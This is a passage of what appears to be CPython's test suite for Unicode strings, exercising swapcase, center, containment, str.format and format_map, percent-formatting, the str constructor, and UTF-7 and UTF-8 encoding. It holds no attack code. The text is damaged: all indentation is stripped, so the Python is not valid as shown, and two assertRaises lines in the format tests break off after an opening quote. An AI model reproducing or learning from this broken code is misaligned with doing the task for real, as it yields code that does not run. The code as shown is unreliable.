'\U00010427\U0001044F')
self.assertEqual('X\U00010427x\U0001044F'.swapcase(),
'x\U0001044FX\U00010427')
self.assertEqual('fi'.swapcase(), 'FI')
self.assertEqual('\u0130'.swapcase(), '\u0069\u0307')
self.assertEqual('\u03a3'.swapcase(), '\u03c3')
self.assertEqual('\u0345\u03a3'.swapcase(), '\u0399\u03c3')
self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
self.assertEqual('A\u0345\u03a3a'.swapcase(), 'a\u0399\u03c3A')
self.assertEqual('A\u0345\u03a3'.swapcase(), 'a\u0399\u03c2')
self.assertEqual('A\u03a3\u0345'.swapcase(), 'a\u03c2\u0399')
self.assertEqual('\u03a3\u0345 '.swapcase(), '\u03c3\u0399 ')
self.assertEqual('\u03a3'.swapcase(), '\u03c3')
self.assertEqual('ß'.swapcase(), 'SS')
self.assertEqual('\u1fd2'.swapcase(), '\u0399\u0308\u0300')
def test_center(self):
string_tests.CommonTest.test_center(self)
self.assertEqual('x'.center(2, '\U0010FFFF'),
'x\U0010FFFF')
self.assertEqual('x'.center(3, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF')
self.assertEqual('x'.center(4, '\U0010FFFF'),
'\U0010FFFFx\U0010FFFF\U0010FFFF')
@unittest.skipUnless(sys.maxsize == 2**31 - 1, "requires 32-bit system")
@support.cpython_only
def test_case_operation_overflow(self):
size = 2**32//12 + 1
try:
s = "ü" * size
except MemoryError:
self.skipTest('no enough memory (%.0f MiB required)' % (size / 2**20))
try:
self.assertRaises(OverflowError, s.upper)
finally:
del s
def test_contains(self):
self.assertIn('a', 'abdb')
self.assertIn('a', 'bdab')
self.assertIn('a', 'bdaba')
self.assertIn('a', 'bdba')
self.assertNotIn('a', 'bdb')
self.assertIn('a', 'bdba')
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertIn('a', ('a',1,None))
self.assertIn('a', (1,None,'a'))
self.assertNotIn('a', ('x',1,'y'))
self.assertNotIn('a', ('x',1,None))
self.assertNotIn('abcd', 'abcxxxx')
self.assertIn('ab', 'abcd')
self.assertIn('ab', 'abc')
self.assertIn('ab', (1,None,'ab'))
self.assertIn('', 'abc')
self.assertIn('', '')
self.assertIn('', 'abc')
self.assertNotIn('\0', 'abc')
self.assertIn('\0', '\0abc')
self.assertIn('\0', 'abc\0')
self.assertIn('a', '\0abc')
self.assertIn('asdf', 'asdf')
self.assertNotIn('asdf', 'asd')
self.assertNotIn('asdf', '')
self.assertRaises(TypeError, "abc".__contains__)
for fill in ('a', '\u0100', '\U00010300'):
fill *= 9
for delim in ('c', '\u0102', '\U00010302'):
self.assertNotIn(delim, fill)
self.assertIn(delim, fill + delim)
self.assertNotIn(delim * 2, fill)
self.assertIn(delim * 2, fill + delim * 2)
def test_issue18183(self):
'\U00010000\U00100000'.lower()
'\U00010000\U00100000'.casefold()
'\U00010000\U00100000'.upper()
'\U00010000\U00100000'.capitalize()
'\U00010000\U00100000'.title()
'\U00010000\U00100000'.swapcase()
'\U00100000'.center(3, '\U00010000')
'\U00100000'.ljust(3, '\U00010000')
'\U00100000'.rjust(3, '\U00010000')
def test_format(self):
self.assertEqual(''.format(), '')
self.assertEqual('a'.format(), 'a')
self.assertEqual('ab'.format(), 'ab')
self.assertEqual('a{{'.format(), 'a{')
self.assertEqual('a}}'.format(), 'a}')
self.assertEqual('{{b'.format(), '{b')
self.assertEqual('}}b'.format(), '}b')
self.assertEqual('a{{b'.format(), 'a{b')
import datetime
self.assertEqual("My name is {0}".format('Fred'), "My name is Fred")
self.assertEqual("My name is {0[name]}".format(dict(name='Fred')),
"My name is Fred")
self.assertEqual("My name is {0} :-{{}}".format('Fred'),
"My name is Fred :-{}")
d = datetime.date(2007, 8, 18)
self.assertEqual("The year is {0.year}".format(d),
"The year is 2007")
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
class D:
def __init__(self, x):
self.x = x
def __format__(self, spec):
return str(self.x)
# class with __str__, but no __format__
class E:
def __init__(self, x):
self.x = x
def __str__(self):
return 'E(' + self.x + ')'
# class with __repr__, but no __format__ or __str__
class F:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'F(' + self.x + ')'
# class with __format__ that forwards to string, for some format_spec's
class G:
def __init__(self, x):
self.x = x
def __str__(self):
return "string is " + self.x
def __format__(self, format_spec):
if format_spec == 'd':
return 'G(' + self.x + ')'
return object.__format__(self, format_spec)
class I(datetime.date):
def __format__(self, format_spec):
return self.strftime(format_spec)
class J(int):
def __format__(self, format_spec):
return int.__format__(self * 2, format_spec)
class M:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'M(' + self.x + ')'
__str__ = None
class N:
def __init__(self, x):
self.x = x
def __repr__(self):
return 'N(' + self.x + ')'
__format__ = None
self.assertEqual(''.format(), '')
self.assertEqual('abc'.format(), 'abc')
self.assertEqual('{0}'.format('abc'), 'abc')
self.assertEqual('{0:}'.format('abc'), 'abc')
self.assertEqual('X{0}'.format('abc'), 'Xabc')
self.assertEqual('{0}X'.format('abc'), 'abcX')
self.assertEqual('X{0}Y'.format('abc'), 'XabcY')
self.assertEqual('{1}'.format(1, 'abc'), 'abc')
self.assertEqual('X{1}'.format(1, 'abc'), 'Xabc')
self.assertEqual('{1}X'.format(1, 'abc'), 'abcX')
self.assertEqual('X{1}Y'.format(1, 'abc'), 'XabcY')
self.assertEqual('{0}'.format(-15), '-15')
self.assertEqual('{0}{1}'.format(-15, 'abc'), '-15abc')
self.assertEqual('{0}X{1}'.format(-15, 'abc'), '-15Xabc')
self.assertEqual('{{'.format(), '{')
self.assertEqual('}}'.format(), '}')
self.assertEqual('{{}}'.format(), '{}')
self.assertEqual('{{x}}'.format(), '{x}')
self.assertEqual('{{{0}}}'.format(123), '{123}')
self.assertEqual('{{{{0}}}}'.format(), '{{0}}')
self.assertEqual('}}{{'.format(), '}{')
self.assertEqual('}}x{{'.format(), '}x{')
self.assertEqual("{0[foo-bar]}".format({'foo-bar':'baz'}), 'baz')
self.assertEqual("{0[foo bar]}".format({'foo bar':'baz'}), 'baz')
self.assertEqual("{0[ ]}".format({' ':3}), '3')
self.assertEqual('{foo._x}'.format(foo=C(20)), '20')
self.assertEqual('{1}{0}'.format(D(10), D(20)), '2010')
self.assertEqual('{0._x.x}'.format(C(D('abc'))), 'abc')
self.assertEqual('{0[0]}'.format(['abc', 'def']), 'abc')
self.assertEqual('{0[1]}'.format(['abc', 'def']), 'def')
self.assertEqual('{0[1][0]}'.format(['abc', ['def']]), 'def')
self.assertEqual('{0[1][0].x}'.format(['abc', [D('def')]]), 'def')
self.assertEqual('{0:.3s}'.format('abc'), 'abc')
self.assertEqual('{0:.3s}'.format('ab'), 'ab')
self.assertEqual('{0:.3s}'.format('abcdef'), 'abc')
self.assertEqual('{0:.0s}'.format('abcdef'), '')
self.assertEqual('{0:3.3s}'.format('abc'), 'abc')
self.assertEqual('{0:2.3s}'.format('abc'), 'abc')
self.assertEqual('{0:2.2s}'.format('abc'), 'ab')
self.assertEqual('{0:3.2s}'.format('abc'), 'ab ')
self.assertEqual('{0:x<0s}'.format('result'), 'result')
self.assertEqual('{0:x<5s}'.format('result'), 'result')
self.assertEqual('{0:x<6s}'.format('result'), 'result')
self.assertEqual('{0:x<7s}'.format('result'), 'resultx')
self.assertEqual('{0:x<8s}'.format('result'), 'resultxx')
self.assertEqual('{0: <7s}'.format('result'), 'result ')
self.assertEqual('{0:<7s}'.format('result'), 'result ')
self.assertEqual('{0:>7s}'.format('result'), ' result')
self.assertEqual('{0:>8s}'.format('result'), ' result')
self.assertEqual('{0:^8s}'.format('result'), ' result ')
self.assertEqual('{0:^9s}'.format('result'), ' result ')
self.assertEqual('{0:^10s}'.format('result'), ' result ')
self.assertEqual('{0:10000}'.format('a'), 'a' + ' ' * 9999)
self.assertEqual('{0:10000}'.format(''), ' ' * 10000)
self.assertEqual('{0:10000000}'.format(''), ' ' * 10000000)
self.assertEqual('{0:\x00<6s}'.format('foo'), 'foo\x00\x00\x00')
self.assertEqual('{0:\x01<6s}'.format('foo'), 'foo\x01\x01\x01')
self.assertEqual('{0:\x00^6s}'.format('foo'), '\x00foo\x00\x00')
self.assertEqual('{0:^6s}'.format('foo'), ' foo ')
self.assertEqual('{0:\x00<6}'.format(3), '3\x00\x00\x00\x00\x00')
self.assertEqual('{0:\x01<6}'.format(3), '3\x01\x01\x01\x01\x01')
self.assertEqual('{0:\x00^6}'.format(3), '\x00\x003\x00\x00\x00')
self.assertEqual('{0:<6}'.format(3), '3 ')
self.assertEqual('{0:\x00<6}'.format(3.14), '3.14\x00\x00')
self.assertEqual('{0:\x01<6}'.format(3.14), '3.14\x01\x01')
self.assertEqual('{0:\x00^6}'.format(3.14), '\x003.14\x00')
self.assertEqual('{0:^6}'.format(3.14), ' 3.14 ')
self.assertEqual('{0:\x00<12}'.format(3+2.0j), '(3+2j)\x00\x00\x00\x00\x00\x00')
self.assertEqual('{0:\x01<12}'.format(3+2.0j), '(3+2j)\x01\x01\x01\x01\x01\x01')
self.assertEqual('{0:\x00^12}'.format(3+2.0j), '\x00\x00\x00(3+2j)\x00\x00\x00')
self.assertEqual('{0:^12}'.format(3+2.0j), ' (3+2j) ')
self.assertEqual('{0:abc}'.format(C()), 'abc')
self.assertEqual('{0!s}'.format('Hello'), 'Hello')
self.assertEqual('{0!s:}'.format('Hello'), 'Hello')
self.assertEqual('{0!s:15}'.format('Hello'), 'Hello ')
self.assertEqual('{0!s:15s}'.format('Hello'), 'Hello ')
self.assertEqual('{0!r}'.format('Hello'), "'Hello'")
self.assertEqual('{0!r:}'.format('Hello'), "'Hello'")
self.assertEqual('{0!r}'.format(F('Hello')), 'F(Hello)')
self.assertEqual('{0!r}'.format('\u0378'), "'\\u0378'")
self.assertEqual('{0!r}'.format('\u0374'), "'\u0374'")
self.assertEqual('{0!r}'.format(F('\u0374')), 'F(\u0374)')
self.assertEqual('{0!a}'.format('Hello'), "'Hello'")
self.assertEqual('{0!a}'.format('\u0378'), "'\\u0378'")
self.assertEqual('{0!a}'.format('\u0374'), "'\\u0374'")
self.assertEqual('{0!a:}'.format('Hello'), "'Hello'")
self.assertEqual('{0!a}'.format(F('Hello')), 'F(Hello)')
self.assertEqual('{0!a}'.format(F('\u0374')), 'F(\\u0374)')
self.assertEqual('{0}'.format({}), '{}')
self.assertEqual('{0}'.format([]), '[]')
self.assertEqual('{0}'.format([1]), '[1]')
self.assertEqual('{0:d}'.format(G('data')), 'G(data)')
self.assertEqual('{0!s}'.format(G('data')), 'string is data')
self.assertRaises(TypeError, '{0:^10}'.format, E('data'))
self.assertRaises(TypeError, '{0:^10s}'.format, E('data'))
self.assertRaises(TypeError, '{0:>15s}'.format, G('data'))
self.assertEqual("{0:date: %Y-%m-%d}".format(I(year=2007,
month=8,
day=27)),
"date: 2007-08-27")
self.assertEqual("{0}".format(J(10)), "20")
self.assertEqual('{0:}'.format('a'), 'a')
self.assertEqual("{0:.{1}}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{1}s}".format('hello world', 5), 'hello')
self.assertEqual("{0:.{precision}s}".format('hello world', precision=5), 'hello')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width=10, precision=5), 'hello ')
self.assertEqual("{0:{width}.{precision}s}".format('hello world', width='10', precision='5'), 'hello ')
self.assertRaises(ValueError, '{'.format)
self.assertRaises(ValueError, '}'.format)
self.assertRaises(ValueError, 'a{'.format)
self.assertRaises(ValueError, 'a}'.format)
self.assertRaises(ValueError, '{a'.format)
self.assertRaises(ValueError, '}a'.format)
self.assertRaises(IndexError, '{0}'.format)
self.assertRaises(IndexError, '{1}'.format, 'abc')
self.assertRaises(KeyError, '{x}'.format)
self.assertRaises(ValueError, "}{".format)
self.assertRaises(ValueError, "abc{0:{}".format)
self.assertRaises(ValueError, "{0".format)
self.assertRaises(IndexError, "{0.}".format)
self.assertRaises(ValueError, "{0.}".format, 0)
self.assertRaises(ValueError, "{0[}".format)
self.assertRaises(ValueError, "{0[}".format, [])
self.assertRaises(KeyError, "{0]}".format)
self.assertRaises(ValueError, "{0.[]}".format, 0)
self.assertRaises(ValueError, "{0..foo}".format, 0)
self.assertRaises(ValueError, "{0[0}".format, 0)
self.assertRaises(ValueError, "{0[0:foo}".format, 0)
self.assertRaises(KeyError, "{c]}".format)
self.assertRaises(ValueError, "{{ {{{0}}".format, 0)
self.assertRaises(ValueError, "{0}}".format, 0)
self.assertRaises(KeyError, "{foo}".format, bar=3)
self.assertRaises(ValueError, "{0!x}".format, 3)
self.assertRaises(ValueError, "{0!}".format, 0)
self.assertRaises(ValueError, "{0!rs}".format, 0)
self.assertRaises(ValueError, "{!}".format)
self.assertRaises(IndexError, "{:}".format)
self.assertRaises(IndexError, "{:s}".format)
self.assertRaises(IndexError, "{}".format)
big = "23098475029384702983476098230754973209482573"
self.assertRaises(ValueError, ("{" + big + "}").format)
self.assertRaises(ValueError, ("{[" + big + "]}").format, [0])
self.assertRaises(ValueError, "{0[0]x}".format, [None])
self.assertRaises(ValueError, "{0[0](10)}".format, [None])
self.assertRaises(TypeError, '{0[{1}]}'.format, 'abcdefg', 4)
# exceed maximum recursion depth
self.assertRaises(ValueError, "{0:{1:{2}}}".format, 'abc', 's', '')
self.assertRaises(ValueError, "{0:{1:{2:{3:{4:{5:{6}}}}}}}".format,
0, 1, 2, 3, 4, 5, 6, 7)
# string format spec errors
self.assertRaises(ValueError, "{0:-s}".format, '')
self.assertRaises(ValueError, format, "", "-")
self.assertRaises(ValueError, "{0:=s}".format, '')
# Alternate formatting is not supported
self.assertRaises(ValueError, format, '', '
self.assertRaises(ValueError, format, '', '
# Non-ASCII
self.assertEqual("{0:s}{1:s}".format("ABC", "\u0410\u0411\u0412"),
'ABC\u0410\u0411\u0412')
self.assertEqual("{0:.3s}".format("ABC\u0410\u0411\u0412"),
'ABC')
self.assertEqual("{0:.0s}".format("ABC\u0410\u0411\u0412"),
'')
self.assertEqual("{[{}]}".format({"{}": 5}), "5")
self.assertEqual("{[{}]}".format({"{}" : "a"}), "a")
self.assertEqual("{[{]}".format({"{" : "a"}), "a")
self.assertEqual("{[}]}".format({"}" : "a"}), "a")
self.assertEqual("{[[]}".format({"[" : "a"}), "a")
self.assertEqual("{[!]}".format({"!" : "a"}), "a")
self.assertRaises(ValueError, "{a{}b}".format, 42)
self.assertRaises(ValueError, "{a{b}".format, 42)
self.assertRaises(ValueError, "{[}".format, 42)
self.assertEqual("0x{:0{:d}X}".format(0x0,16), "0x0000000000000000")
# Blocking fallback
m = M('data')
self.assertEqual("{!r}".format(m), 'M(data)')
self.assertRaises(TypeError, "{!s}".format, m)
self.assertRaises(TypeError, "{}".format, m)
n = N('data')
self.assertEqual("{!r}".format(n), 'N(data)')
self.assertEqual("{!s}".format(n), 'N(data)')
self.assertRaises(TypeError, "{}".format, n)
def test_format_map(self):
self.assertEqual(''.format_map({}), '')
self.assertEqual('a'.format_map({}), 'a')
self.assertEqual('ab'.format_map({}), 'ab')
self.assertEqual('a{{'.format_map({}), 'a{')
self.assertEqual('a}}'.format_map({}), 'a}')
self.assertEqual('{{b'.format_map({}), '{b')
self.assertEqual('}}b'.format_map({}), '}b')
self.assertEqual('a{{b'.format_map({}), 'a{b')
# using mappings
class Mapping(dict):
def __missing__(self, key):
return key
self.assertEqual('{hello}'.format_map(Mapping()), 'hello')
self.assertEqual('{a} {world}'.format_map(Mapping(a='hello')), 'hello world')
class InternalMapping:
def __init__(self):
self.mapping = {'a': 'hello'}
def __getitem__(self, key):
return self.mapping[key]
self.assertEqual('{a}'.format_map(InternalMapping()), 'hello')
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
self.assertEqual('{foo._x}'.format_map({'foo': C(20)}), '20')
# test various errors
self.assertRaises(TypeError, ''.format_map)
self.assertRaises(TypeError, 'a'.format_map)
self.assertRaises(ValueError, '{'.format_map, {})
self.assertRaises(ValueError, '}'.format_map, {})
self.assertRaises(ValueError, 'a{'.format_map, {})
self.assertRaises(ValueError, 'a}'.format_map, {})
self.assertRaises(ValueError, '{a'.format_map, {})
self.assertRaises(ValueError, '}a'.format_map, {})
# issue #12579: can't supply positional params to format_map
self.assertRaises(ValueError, '{}'.format_map, {'a' : 2})
self.assertRaises(ValueError, '{}'.format_map, 'a')
self.assertRaises(ValueError, '{a} {}'.format_map, {"a" : 2, "b" : 1})
def test_format_huge_precision(self):
format_string = ".{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_width(self):
format_string = "{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format(2.34, format_string)
def test_format_huge_item_number(self):
format_string = "{{{}:.6f}}".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string.format(2.34)
def test_format_auto_numbering(self):
class C:
def __init__(self, x=100):
self._x = x
def __format__(self, spec):
return spec
self.assertEqual('{}'.format(10), '10')
self.assertEqual('{:5}'.format('s'), 's ')
self.assertEqual('{!r}'.format('s'), "'s'")
self.assertEqual('{._x}'.format(C(10)), '10')
self.assertEqual('{[1]}'.format([1, 2]), '2')
self.assertEqual('{[a]}'.format({'a':4, 'b':2}), '4')
self.assertEqual('a{}b{}c'.format(0, 1), 'a0b1c')
self.assertEqual('a{:{}}b'.format('x', '^10'), 'a x b')
self.assertEqual('a{:{}x}b'.format(20, '#'), 'a0x14b')
self.assertRaises(ValueError, '{}{1}'.format, 1, 2)
self.assertRaises(ValueError, '{1}{}'.format, 1, 2)
self.assertRaises(ValueError, '{:{1}}'.format, 1, 2)
self.assertRaises(ValueError, '{0:{}}'.format, 1, 2)
# can mix and match auto-numbering and named
self.assertEqual('{f}{}'.format(4, f='test'), 'test4')
self.assertEqual('{}{f}'.format(4, f='test'), '4test')
self.assertEqual('{:{f}}{g}{}'.format(1, 3, g='g', f=2), ' 1g3')
self.assertEqual('{f:{}}{}{g}'.format(2, 4, f=1, g='g'), ' 14g')
def test_formatting(self):
string_tests.MixinStrUnicodeUserStringTest.test_formatting(self)
# Testing Unicode formatting strings...
self.assertEqual("%s, %s" % ("abc", "abc"), 'abc, abc')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, 2, 3), 'abc, abc, 1, 2.000000, 3.00')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", 1, -2, 3), 'abc, abc, 1, -2.000000, 3.00')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.5), 'abc, abc, -1, -2.000000, 3.50')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 3.57), 'abc, abc, -1, -2.000000, 3.57')
self.assertEqual("%s, %s, %i, %f, %5.2f" % ("abc", "abc", -1, -2, 1003.57), 'abc, abc, -1, -2.000000, 1003.57')
if not sys.platform.startswith('java'):
self.assertEqual("%r, %r" % (b"abc", "abc"), "b'abc', 'abc'")
self.assertEqual("%r" % ("\u1234",), "'\u1234'")
self.assertEqual("%a" % ("\u1234",), "'\\u1234'")
self.assertEqual("%(x)s, %(y)s" % {'x':"abc", 'y':"def"}, 'abc, def')
self.assertEqual("%(x)s, %(\xfc)s" % {'x':"abc", '\xfc':"def"}, 'abc, def')
self.assertEqual('%c' % 0x1234, '\u1234')
self.assertEqual('%c' % 0x21483, '\U00021483')
self.assertRaises(OverflowError, "%c".__mod__, (0x110000,))
self.assertEqual('%c' % '\U00021483', '\U00021483')
self.assertRaises(TypeError, "%c".__mod__, "aa")
self.assertRaises(ValueError, "%.1\u1032f".__mod__, (1.0/3))
self.assertRaises(TypeError, "%i".__mod__, "aa")
# formatting jobs delegated from the string implementation:
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc"}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
self.assertEqual('...%(foo)s...' % {'foo':"abc",'def':123}, '...abc...')
self.assertEqual('...%s...%s...%s...%s...' % (1,2,3,"abc"), '...1...2...3...abc...')
self.assertEqual('...%%...%%s...%s...%s...%s...%s...' % (1,2,3,"abc"), '...%...%s...1...2...3...abc...')
self.assertEqual('...%s...' % "abc", '...abc...')
self.assertEqual('%*s' % (5,'abc',), ' abc')
self.assertEqual('%*s' % (-5,'abc',), 'abc ')
self.assertEqual('%*.*s' % (5,2,'abc',), ' ab')
self.assertEqual('%*.*s' % (5,3,'abc',), ' abc')
self.assertEqual('%i %*.*s' % (10, 5,3,'abc',), '10 abc')
self.assertEqual('%i%s %*.*s' % (10, 3, 5, 3, 'abc',), '103 abc')
self.assertEqual('%c' % 'a', 'a')
class Wrapper:
def __str__(self):
return '\u1234'
self.assertEqual('%s' % Wrapper(), '\u1234')
# issue 3382
NAN = float('nan')
INF = float('inf')
self.assertEqual('%f' % NAN, 'nan')
self.assertEqual('%F' % NAN, 'NAN')
self.assertEqual('%f' % INF, 'inf')
self.assertEqual('%F' % INF, 'INF')
# PEP 393
self.assertEqual('%.1s' % "a\xe9\u20ac", 'a')
self.assertEqual('%.2s' % "a\xe9\u20ac", 'a\xe9')
#issue 19995
class PseudoInt:
def __init__(self, value):
self.value = int(value)
def __int__(self):
return self.value
def __index__(self):
return self.value
class PseudoFloat:
def __init__(self, value):
self.value = float(value)
def __int__(self):
return int(self.value)
pi = PseudoFloat(3.1415)
letter_m = PseudoInt(109)
self.assertEqual('%x' % 42, '2a')
self.assertEqual('%X' % 15, 'F')
self.assertEqual('%o' % 9, '11')
self.assertEqual('%c' % 109, 'm')
self.assertEqual('%x' % letter_m, '6d')
self.assertEqual('%X' % letter_m, '6D')
self.assertEqual('%o' % letter_m, '155')
self.assertEqual('%c' % letter_m, 'm')
self.assertRaisesRegex(TypeError, '%x format: an integer is required, not float', operator.mod, '%x', 3.14),
self.assertRaisesRegex(TypeError, '%X format: an integer is required, not float', operator.mod, '%X', 2.11),
self.assertRaisesRegex(TypeError, '%o format: an integer is required, not float', operator.mod, '%o', 1.79),
self.assertRaisesRegex(TypeError, '%x format: an integer is required, not PseudoFloat', operator.mod, '%x', pi),
self.assertRaises(TypeError, operator.mod, '%c', pi),
def test_formatting_with_enum(self):
# issue18780
import enum
class Float(float, enum.Enum):
PI = 3.1415926
class Int(enum.IntEnum):
IDES = 15
class Str(str, enum.Enum):
ABC = 'abc'
# Testing Unicode formatting strings...
self.assertEqual("%s, %s" % (Str.ABC, Str.ABC),
'Str.ABC, Str.ABC')
self.assertEqual("%s, %s, %d, %i, %u, %f, %5.2f" %
(Str.ABC, Str.ABC,
Int.IDES, Int.IDES, Int.IDES,
Float.PI, Float.PI),
'Str.ABC, Str.ABC, 15, 15, 15, 3.141593, 3.14')
# formatting jobs delegated from the string implementation:
self.assertEqual('...%(foo)s...' % {'foo':Str.ABC},
'...Str.ABC...')
self.assertEqual('...%(foo)s...' % {'foo':Int.IDES},
'...Int.IDES...')
self.assertEqual('...%(foo)i...' % {'foo':Int.IDES},
'...15...')
self.assertEqual('...%(foo)d...' % {'foo':Int.IDES},
'...15...')
self.assertEqual('...%(foo)u...' % {'foo':Int.IDES, 'def':Float.PI},
'...15...')
self.assertEqual('...%(foo)f...' % {'foo':Float.PI,'def':123},
'...3.141593...')
def test_formatting_huge_precision(self):
format_string = "%.{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_issue28598_strsubclass_rhs(self):
# A subclass of str with an __rmod__ method should be able to hook
# into the % operator
class SubclassedStr(str):
def __rmod__(self, other):
return 'Success, self.__rmod__({!r}) was called'.format(other)
self.assertEqual('lhs %% %r' % SubclassedStr('rhs'),
"Success, self.__rmod__('lhs %% %r') was called")
@support.cpython_only
def test_formatting_huge_precision_c_limits(self):
from _testcapi import INT_MAX
format_string = "%.{}f".format(INT_MAX + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_formatting_huge_width(self):
format_string = "%{}f".format(sys.maxsize + 1)
with self.assertRaises(ValueError):
result = format_string % 2.34
def test_startswith_endswith_errors(self):
for meth in ('foo'.startswith, 'foo'.endswith):
with self.assertRaises(TypeError) as cm:
meth(['f'])
exc = str(cm.exception)
self.assertIn('str', exc)
self.assertIn('tuple', exc)
@support.run_with_locale('LC_ALL', 'de_DE', 'fr_FR')
def test_format_float(self):
# should not format with a comma, but always with C locale
self.assertEqual('1.0', '%.1f' % 1.0)
def test_constructor(self):
# unicode(obj) tests (this maps to PyObject_Unicode() at C level)
self.assertEqual(
str('unicode remains unicode'),
'unicode remains unicode'
)
for text in ('ascii', '\xe9', '\u20ac', '\U0010FFFF'):
subclass = StrSubclass(text)
self.assertEqual(str(subclass), text)
self.assertEqual(len(subclass), len(text))
if text == 'ascii':
self.assertEqual(subclass.encode('ascii'), b'ascii')
self.assertEqual(subclass.encode('utf-8'), b'ascii')
self.assertEqual(
str('strings are converted to unicode'),
'strings are converted to unicode'
)
class StringCompat:
def __init__(self, x):
self.x = x
def __str__(self):
return self.x
self.assertEqual(
str(StringCompat('__str__ compatible objects are recognized')),
'__str__ compatible objects are recognized'
)
# unicode(obj) is compatible to str():
o = StringCompat('unicode(obj) is compatible to str()')
self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
self.assertEqual(str(o), 'unicode(obj) is compatible to str()')
for obj in (123, 123.45, 123):
self.assertEqual(str(obj), str(str(obj)))
# unicode(obj, encoding, error) tests (this maps to
# PyUnicode_FromEncodedObject() at C level)
if not sys.platform.startswith('java'):
self.assertRaises(
TypeError,
str,
'decoding unicode is not supported',
'utf-8',
'strict'
)
self.assertEqual(
str(b'strings are decoded to unicode', 'utf-8', 'strict'),
'strings are decoded to unicode'
)
if not sys.platform.startswith('java'):
self.assertEqual(
str(
memoryview(b'character buffers are decoded to unicode'),
'utf-8',
'strict'
),
'character buffers are decoded to unicode'
)
self.assertRaises(TypeError, str, 42, 42, 42)
def test_constructor_keyword_args(self):
# The object argument can be passed as a keyword.
self.assertEqual(str(object='foo'), 'foo')
self.assertEqual(str(object=b'foo', encoding='utf-8'), 'foo')
# The errors argument without encoding triggers "decode" mode.
self.assertEqual(str(b'foo', errors='strict'), 'foo') # not "b'foo'"
self.assertEqual(str(object=b'foo', errors='strict'), 'foo')
def test_constructor_defaults(self):
# The object argument defaults to '' or b''.
self.assertEqual(str(), '')
self.assertEqual(str(errors='strict'), '')
utf8_cent = '¢'.encode('utf-8')
# The encoding argument defaults to utf-8.
self.assertEqual(str(utf8_cent, errors='strict'), '¢')
# The errors argument defaults to strict.
self.assertRaises(UnicodeDecodeError, str, utf8_cent, encoding='ascii')
def test_codecs_utf7(self):
utfTests = [
('A\u2262\u0391.', b'A+ImIDkQ.'), # RFC2152 example
('Hi Mom -\u263a-!', b'Hi Mom -+Jjo--!'), # RFC2152 example
('\u65E5\u672C\u8A9E', b'+ZeVnLIqe-'), # RFC2152 example
('Item 3 is \u00a31.', b'Item 3 is +AKM-1.'), # RFC2152 example
('+', b'+-'),
('+-', b'+--'),
('+?', b'+-?'),
(r'\?', b'+AFw?'),
('+?', b'+-?'),
(r'\\?', b'+AFwAXA?'),
(r'\\\?', b'+AFwAXABc?'),
(r'++--', b'+-+---'),
('\U000abcde', b'+2m/c3g-'), # surrogate pairs
('/', b'/'),
]
for (x, y) in utfTests:
self.assertEqual(x.encode('utf-7'), y)
# Unpaired surrogates are passed through
self.assertEqual('\uD801'.encode('utf-7'), b'+2AE-')
self.assertEqual('\uD801x'.encode('utf-7'), b'+2AE-x')
self.assertEqual('\uDC01'.encode('utf-7'), b'+3AE-')
self.assertEqual('\uDC01x'.encode('utf-7'), b'+3AE-x')
self.assertEqual(b'+2AE-'.decode('utf-7'), '\uD801')
self.assertEqual(b'+2AE-x'.decode('utf-7'), '\uD801x')
self.assertEqual(b'+3AE-'.decode('utf-7'), '\uDC01')
self.assertEqual(b'+3AE-x'.decode('utf-7'), '\uDC01x')
self.assertEqual('\uD801\U000abcde'.encode('utf-7'), b'+2AHab9ze-')
self.assertEqual(b'+2AHab9ze-'.decode('utf-7'), '\uD801\U000abcde')
# Issue #2242: crash on some Windows/MSVC versions
self.assertEqual(b'+\xc1'.decode('utf-7', 'ignore'), '')
# Direct encoded characters
set_d = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'(),-./:?"
set_o = '!"#$%&*;<=>@[]^_`{|}'
for c in set_d:
self.assertEqual(c.encode('utf7'), c.encode('ascii'))
self.assertEqual(c.encode('ascii').decode('utf7'), c)
for c in set_o:
self.assertEqual(c.encode('ascii').decode('utf7'), c)
def test_codecs_utf8(self):
self.assertEqual(''.encode('utf-8'), b'')
self.assertEqual('\u20ac'.encode('utf-8'), b'\xe2\x82\xac')
self.assertEqual('\U00010002'.encode('utf-8'), b'\xf0\x90\x80\x82')
self.assertEqual('\U00023456'.encode('utf-8'), b'\xf0\xa3\x91\x96')
self.assertEqual('\ud800'.encode('utf-8', 'surrogatepass'), b'\xed\xa0\x80')
self.assertEqual('\udc00'.encode('utf-8', 'surrogatepass'), b'\xed\xb0\x80')
self.assertEqual(('\U00010002'*10).encode('utf-8'),
b'\xf0\x90\x80\x82'*10)
self.assertEqual(
'\u6b63\u78ba\u306b\u8a00\u3046\u3068\u7ffb\u8a33\u306f'
'\u3055\u308c\u3066\u3044\u307e\u305b\u3093\u3002\u4e00'
'\u90e8\u306f\u30c9\u30a4\u30c4\u8a9e\u3067\u3059\u304c'
'\u3001\u3042\u3068\u306f\u3067\u305f\u3089\u3081\u3067'
